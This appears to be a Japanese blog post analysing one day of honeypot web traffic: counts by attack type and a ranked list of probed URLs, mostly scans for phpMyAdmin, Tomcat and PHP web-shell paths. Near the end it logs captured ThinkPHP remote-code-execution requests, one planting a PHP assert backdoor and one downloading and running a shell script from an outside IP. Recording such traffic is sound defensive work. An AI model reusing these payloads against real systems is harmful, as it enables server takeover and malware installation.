1月18日(金) ハニーポットアクセス解析

 thinkphpの脆弱性をついた攻撃でダウンロードしようとしている形跡があったのでアクセスしてみましたが、拒否されてしまいました・・・

 

攻撃種別アクセスランキング

詳細 アクセス数
phpファイル確認 314
phpmyadmin調査 155
webアクセス 69
tomcat確認 58
MySQL調査 28
WordPress調査 11
情報取得確認 11
Drupal調査 8
プロキシ確認 5
Apache調査 3
linux用バックドア調査 3
web属性取得 2
Web接続確認 2
thinkphp脆弱性攻撃 2


 

アクセス先別ランキング

順位 検知数 URL 備考
1 57 GET /manager/html HTTP/1.1 tomcat確認
2 56 GET / HTTP/1.1 webアクセス
3 10 GET / HTTP/1.0 webアクセス
4 9 GET /.git/config HTTP/1.1 情報取得確認
5 7 GET /shell.php HTTP/1.1 phpファイル確認
9 6 POST /xx.php HTTP/1.1 phpファイル確認
9 6 POST /qq.php HTTP/1.1 phpファイル確認
9 6 POST /q.php HTTP/1.1 phpファイル確認
9 6 POST /conflg.php HTTP/1.1 phpファイル確認
9 6 GET /tools/phpMyAdmin/index.php HTTP/1.1 phpmyadmin調査
9 6 GET /phpMyAdmin/index.php HTTP/1.1 phpmyadmin調査
9 6 GET /claroline/phpMyAdmin/index.php HTTP/1.1 phpmyadmin調査
13.5 5 GET /web/phpMyAdmin/index.php HTTP/1.1 phpmyadmin調査
13.5 5 GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1 phpmyadmin調査
17 4 POST /s.php HTTP/1.1 phpファイル確認
17 4 GET /shaAdmin/index.php HTTP/1.1 phpファイル確認
17 4 GET /phpMyAdmina/index.php HTTP/1.1 phpmyadmin調査
17 4 GET /cmd.php HTTP/1.1 phpファイル確認
17 4 GET /admin/phpMyAdmin/index.php HTTP/1.1 phpmyadmin調査
70.5 3 POST /zuoshou.php HTTP/1.1 phpファイル確認
70.5 3 POST /zuo.php HTTP/1.1 phpファイル確認
70.5 3 POST /yumo.php HTTP/1.1 phpファイル確認
70.5 3 POST /xw.php HTTP/1.1 phpファイル確認
70.5 3 POST /xw1.php HTTP/1.1 phpファイル確認
70.5 3 POST /xshell.php HTTP/1.1 phpファイル確認
70.5 3 POST /xiao.php HTTP/1.1 linux用バックドア調査
70.5 3 POST /wuwu11.php HTTP/1.1 phpファイル確認
70.5 3 POST /w.php HTTP/1.1 phpファイル確認
70.5 3 POST /wp-admins.php HTTP/1.1 WordPress調査
70.5 3 POST /webslee.php HTTP/1.1 phpファイル確認
70.5 3 POST /wc.php HTTP/1.1 phpファイル確認
70.5 3 POST /wan.php HTTP/1.1 phpファイル確認
70.5 3 POST /wanan.php HTTP/1.1 phpファイル確認
70.5 3 POST /test.php HTTP/1.1 phpファイル確認
70.5 3 POST /system.php HTTP/1.1 phpファイル確認
70.5 3 POST /sheep.php HTTP/1.1 phpファイル確認
70.5 3 POST /phpStudy.php HTTP/1.1 phpファイル確認
70.5 3 POST /mz.php HTTP/1.1 phpファイル確認
70.5 3 POST /mx.php HTTP/1.1 phpファイル確認
70.5 3 POST /min.php HTTP/1.1 phpファイル確認
70.5 3 POST /lindex.php HTTP/1.1 phpファイル確認
70.5 3 POST /l8.php HTTP/1.1 phpファイル確認
70.5 3 POST /l6.php HTTP/1.1 phpファイル確認
70.5 3 POST /ip.php HTTP/1.1 phpファイル確認
70.5 3 POST /infoo.php HTTP/1.1 phpファイル確認
70.5 3 POST /hm.php HTTP/1.1 phpファイル確認
70.5 3 POST /feixiang.php HTTP/1.1 phpファイル確認
70.5 3 POST /defect.php HTTP/1.1 phpファイル確認
70.5 3 POST /db_session.init.php HTTP/1.1 phpファイル確認
70.5 3 POST /db.init.php HTTP/1.1 phpファイル確認
70.5 3 POST /db_desql.php HTTP/1.1 phpファイル確認
70.5 3 POST /db_dataml.php HTTP/1.1 phpファイル確認
70.5 3 POST /cmd.php HTTP/1.1 phpファイル確認
70.5 3 POST /bak.php HTTP/1.1 phpファイル確認
70.5 3 POST /aotu.php HTTP/1.1 phpファイル確認
70.5 3 POST /aotu7.php HTTP/1.1 phpファイル確認
70.5 3 POST /9678.php HTTP/1.1 phpファイル確認
70.5 3 POST /56.php HTTP/1.1 phpファイル確認
70.5 3 POST /12.php HTTP/1.1 phpファイル確認
70.5 3 GET /z.php HTTP/1.1 phpファイル確認
70.5 3 GET /xampp/phpmyadmin/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /www/phpMyAdmin/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /wp-config.php HTTP/1.1 WordPress調査
70.5 3 GET /webdav/ HTTP/1.1 WordPress調査
70.5 3 GET /typo3/phpmyadmin/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /text.php HTTP/1.1 phpファイル確認
70.5 3 GET /shopdb/index.php HTTP/1.1 phpファイル確認
70.5 3 GET /_query.php HTTP/1.1 phpファイル確認
70.5 3 GET /pwd/index.php HTTP/1.1 phpファイル確認
70.5 3 GET /program/index.php HTTP/1.1 phpファイル確認
70.5 3 GET /pmd_online.php HTTP/1.1 phpファイル確認
70.5 3 GET /pmd/index.php HTTP/1.1 phpファイル確認
70.5 3 GET /pma-old/index.php HTTP/1.1 phpファイル確認
70.5 3 GET /pmamy2/index.php HTTP/1.1 phpファイル確認
70.5 3 GET /PMA/index.php HTTP/1.1 phpファイル確認
70.5 3 GET /plugins/weathermap/editor.php HTTP/1.1 phpファイル確認
70.5 3 GET /phpmy/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpMyAdmion/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpMyAdmin/scripts/setup.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpMyAdminold/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpMyAdmin.old/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpmyadmin-old/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpMyAdmin+++---/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpmyadmin/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpMyadmin_bak/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpmyadmin2/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpMyAdmin123/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpmyadmin0/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpMyadmi/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpmyadm1n/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpma/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpAdmin/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /phpadmin/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /mysql/mysqlmanager/index.php HTTP/1.1 MySQL調査
70.5 3 GET /mysql/admin/index.php HTTP/1.1 MySQL調査
70.5 3 GET /mysql_admin/index.php HTTP/1.1 MySQL調査
70.5 3 GET /MyAdmin/index.php HTTP/1.1 MySQL調査
70.5 3 GET /myadmin/index.php HTTP/1.1 MySQL調査
70.5 3 GET /myadmin2/index.php HTTP/1.1 MySQL調査
70.5 3 GET /muhstik.php HTTP/1.1 Drupal調査
70.5 3 GET /lol.php HTTP/1.1 phpファイル確認
70.5 3 GET /lala-dpr.php HTTP/1.1 phpファイル確認
70.5 3 GET /knal.php HTTP/1.1 phpファイル確認
70.5 3 GET /java.php HTTP/1.1 phpファイル確認
70.5 3 GET /index.php HTTP/1.1 phpファイル確認
70.5 3 GET /help.php HTTP/1.1 phpファイル確認
70.5 3 GET /help-e.php HTTP/1.1 phpファイル確認
70.5 3 GET /db_pma.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /db/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /db_cts.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /dbadmin/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /cmv.php HTTP/1.1 phpファイル確認
70.5 3 GET /cmdd.php HTTP/1.1 phpファイル確認
70.5 3 GET /cacti/plugins/weathermap/editor.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /appserv.php HTTP/1.1 Apache調査
70.5 3 GET /admin/PMA/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /admin/pma/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /admin/phpmyadmin/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /admin/phpmyadmin2/index.php HTTP/1.1 phpmyadmin調査
70.5 3 GET /admin/index.php HTTP/1.1 phpmyadmin調査
149 2 PROPFIND / HTTP/1.1 web属性取得
149 2 POST /yao.php HTTP/1.1 phpファイル確認
149 2 POST /wshell.php HTTP/1.1 phpファイル確認
149 2 POST /weixiao.php HTTP/1.1 phpファイル確認
149 2 POST /ssaa.php HTTP/1.1 phpファイル確認
149 2 POST /qaq.php HTTP/1.1 phpファイル確認
149 2 POST /python.php HTTP/1.1 phpファイル確認
149 2 POST /post.php HTTP/1.1 phpファイル確認
149 2 POST /phpstudy.php HTTP/1.1 phpファイル確認
149 2 POST /phpinfi.php HTTP/1.1 phpファイル確認
149 2 POST /pe.php HTTP/1.1 phpファイル確認
149 2 POST /m.php?pbid=open HTTP/1.1 phpファイル確認
149 2 POST /l7.php HTTP/1.1 phpファイル確認
149 2 POST /hh.php HTTP/1.1 phpファイル確認
149 2 POST /default.php HTTP/1.1 phpファイル確認
149 2 POST /db__.init.php HTTP/1.1 phpファイル確認
149 2 POST /cainiao.php HTTP/1.1 phpファイル確認
149 2 POST /aw.php HTTP/1.1 phpファイル確認
149 2 POST /ak.php HTTP/1.1 phpファイル確認
149 2 POST /ak48.php HTTP/1.1 phpファイル確認
149 2 POST /ak47.php HTTP/1.1 phpファイル確認
149 2 POST /aaaa.php HTTP/1.1 phpファイル確認
149 2 POST /1213.php HTTP/1.1 phpファイル確認
149 2 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1 phpmyadmin調査
149 2 GET /v/index.php HTTP/1.1 phpファイル確認
149 2 GET /uploader.php HTTP/1.1 phpファイル確認
149 2 GET /test.php HTTP/1.1 phpファイル確認
149 2 GET /pmamy/index.php HTTP/1.1 phpファイル確認
149 2 GET /pma/index.php HTTP/1.1 phpファイル確認
149 2 GET /phppma/index.php HTTP/1.1 phpファイル確認
149 2 GET /phpMydmin/index.php HTTP/1.1 phpmyadmin調査
149 2 GET /phpmyadmin/scripts/setup.php HTTP/1.1 phpmyadmin調査
149 2 GET /phpmyadmin/scripts/db___.init.php HTTP/1.1 phpmyadmin調査
149 2 GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1 phpmyadmin調査
149 2 GET /phpMyAdmin__/index.php HTTP/1.1 phpmyadmin調査
149 2 GET /phpMyAdmin-4.4.0/index.php HTTP/1.1 phpmyadmin調査
149 2 GET /phpMyAdmin1/index.php HTTP/1.1 phpmyadmin調査
149 2 GET /phpmyadmin1/index.php HTTP/1.1 phpmyadmin調査
149 2 GET /phpMyAdm1n/index.php HTTP/1.1 phpmyadmin調査
149 2 GET /phpMyAbmin/index.php HTTP/1.1 phpmyadmin調査
149 2 GET /mysql/sqlmanager/index.php HTTP/1.1 MySQL調査
149 2 GET /mysql/index.php HTTP/1.1 MySQL調査
149 2 GET /mysql/dbadmin/index.php HTTP/1.1 MySQL調査
149 2 GET /mysqladmin/index.php HTTP/1.1 MySQL調査
149 2 GET /mysql-admin/index.php HTTP/1.1 MySQL調査
149 2 GET /muhstiks.php HTTP/1.1 Drupal調査
149 2 GET /muhstik-dpr.php HTTP/1.1 Drupal調査
149 2 GET /log.php HTTP/1.1 phpファイル確認
149 2 GET /logon.php HTTP/1.1 phpファイル確認
149 2 GET /license.php HTTP/1.1 phpファイル確認
149 2 GET /hell.php HTTP/1.1 phpファイル確認
149 2 GET /desktop.ini.php HTTP/1.1 phpファイル確認
149 2 GET /cmx.php HTTP/1.1 phpファイル確認
149 2 GET /admin/mysql/index.php HTTP/1.1 phpmyadmin調査
149 2 GET /admin/mysql2/index.php HTTP/1.1 phpmyadmin調査
198.5 1 POST /zuoss.php HTTP/1.1 phpファイル確認
198.5 1 POST /zuos.php HTTP/1.1 phpファイル確認
198.5 1 POST /zuoshss.php HTTP/1.1 phpファイル確認
198.5 1 POST /zuoindex.php HTTP/1.1 phpファイル確認
198.5 1 POST /zshmindex.php HTTP/1.1 phpファイル確認
198.5 1 POST /xz.php HTTP/1.1 phpファイル確認
198.5 1 POST /wcp.php HTTP/1.1 phpファイル確認
198.5 1 POST /tomcat.php HTTP/1.1 tomcat確認
198.5 1 POST /ss.php HTTP/1.1 phpファイル確認
198.5 1 POST /sean.php HTTP/1.1 phpファイル確認
198.5 1 POST /qw.php HTTP/1.1 phpファイル確認
198.5 1 POST /qwe.php HTTP/1.1 phpファイル確認
198.5 1 POST /ou2.php HTTP/1.1 phpファイル確認
198.5 1 POST /miao.php HTTP/1.1 phpファイル確認
198.5 1 POST /linuxse.php HTTP/1.1 phpファイル確認
198.5 1 POST /index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1]=1ndex.php&vars[1][1]=%3C?php%20assert($_POST['fuck'])?%3E HTTP/1.1 thinkphp脆弱性攻撃
198.5 1 POST http:check.proxyradar.com/azenv.php?auth=154781378399&a=PSCMN&i=3468503894&p=80 HTTP/1.1 プロキシ確認
198.5 1 POST http:check.proxyradar.com/azenv.php?auth=154779702825&a=PSCMN&i=3468503894&p=80 HTTP/1.1 プロキシ確認
198.5 1 POST http:check.proxyradar.com/azenv.php?auth=154778006581&a=PSCMN&i=3468503894&p=8080 HTTP/1.1 プロキシ確認
198.5 1 POST http:check.proxyradar.com/azenv.php?auth=154774661703&a=PSCMN&i=3468503894&p=8080 HTTP/1.1 プロキシ確認
198.5 1 POST / HTTP/1.1 phpファイル確認
198.5 1 POST /h1.php HTTP/1.1 phpファイル確認
198.5 1 POST /ceshi.php HTTP/1.1 phpファイル確認
198.5 1 POST /boots.php HTTP/1.1 phpファイル確認
198.5 1 POST /app.php HTTP/1.1 phpファイル確認
198.5 1 POST /9510.php HTTP/1.1 phpファイル確認
198.5 1 POST /3.php HTTP/1.1 phpファイル確認
198.5 1 POST /1ndex.php HTTP/1.1 phpファイル確認
198.5 1 HEAD /robots.txt HTTP/1.0 情報取得確認
198.5 1 HEAD /redirect.php HTTP/1.0 Web接続確認
198.5 1 GET /x.php HTTP/1.1 phpファイル確認
198.5 1 GET /wpo.php HTTP/1.1 WordPress調査
198.5 1 GET /wpc.php HTTP/1.1 WordPress調査
198.5 1 GET /status HTTP/1.1 webアクセス
198.5 1 GET /stat HTTP/1.1 webアクセス
198.5 1 GET /servlet?p=login&q=loginForm&jumpto=status HTTP/1.1 webアクセス
198.5 1 GET /scripts/setup.php HTTP/1.1 phpファイル確認
198.5 1 GET /robots.txt HTTP/1.1 情報取得確認
198.5 1 GET /PMA2/index.php HTTP/1.1 phpファイル確認
198.5 1 GET /muhstik2.php HTTP/1.1 Drupal調査
198.5 1 GET /lala.php HTTP/1.1 phpファイル確認
198.5 1 GET /index.php?s=/index/¥think¥app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=cd%20/tmp;wget%20http:167.99.219.142/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1 thinkphp脆弱性攻撃
198.5 1 GET http:httpheader.net/ HTTP/1.1 Web接続確認
198.5 1 CONNECT check.proxyradar.com:80 HTTP/1.1 プロキシ確認